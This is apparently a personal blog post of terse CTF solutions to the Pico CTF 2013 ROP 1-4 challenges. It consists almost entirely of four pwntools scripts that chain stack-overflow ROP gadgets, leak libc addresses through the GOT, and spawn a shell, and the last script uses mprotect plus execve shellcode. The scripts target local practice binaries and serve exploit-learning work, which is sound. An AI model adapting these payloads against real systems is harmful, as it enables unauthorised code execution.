Pico CTF 2013 ROP 1~4

System/Pwnable Practice 2019. 7. 24. 21:52

rop1.py

from pwn import *

p = process("./rop1")

shell = 0x080484A4

payload = "A"*(0x88+4)
payload += p32(shell)

p.sendline(payload)

p.interactive()

rop2.py

from pwn import *

p = process("./rop2")

write_plt = 0x80483d0
read_plt = 0x8048380
read_got = 0x804a000
pppr = 0x804859d
binsh = 0x08048610
distance = 0xf7e66cb0 - 0xf7dbd200

payload = "A"*(0x88+4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += "A"*4
payload += p32(binsh)

p.sendline(payload)
system = p32(u32(p.recv(4))-distance)
p.sendline(system)
p.interactive()

rop3.py

from pwn import *

p = process("./rop3")

write_plt = 0x80483a0
pppr = 0x804855d
read_plt = 0x8048360
read_got = 0x804a000
bss = 0x0804a020
distance = 0xf7e3acb0 - 0xf7d91200
binsh = "/bin/sh\x00"

payload = "A"*(0x88+4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh))

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += "A"*4
payload += p32(bss)


p.sendline(payload)
read = u32(p.recv(4))
system = p32(read-distance)
p.send(binsh)
p.sendline(system)
p.interactive()

rop4.py

from pwn import *

p = process("./rop4")

read = 0x8053d20
mprotect = 0x8054990
pppr = 0x80c5e4c
bss = 0x80f0000
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

payload = "A"*(0x88+4)
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))

payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)

payload += p32(bss)

p.sendline(payload)
p.sendline(shellCode)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

SECCON CTF 2018 Classic (0)	2019.07.28
Defcon CTF 2015 r0pbaby (0)	2019.07.28
Pico CTF 2018 Can you gets me (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27
Codegate 2018 CTF Quals BaskinRobins31 (0)	2019.07.24

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Pico CTF 2013 ROP 1~4

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바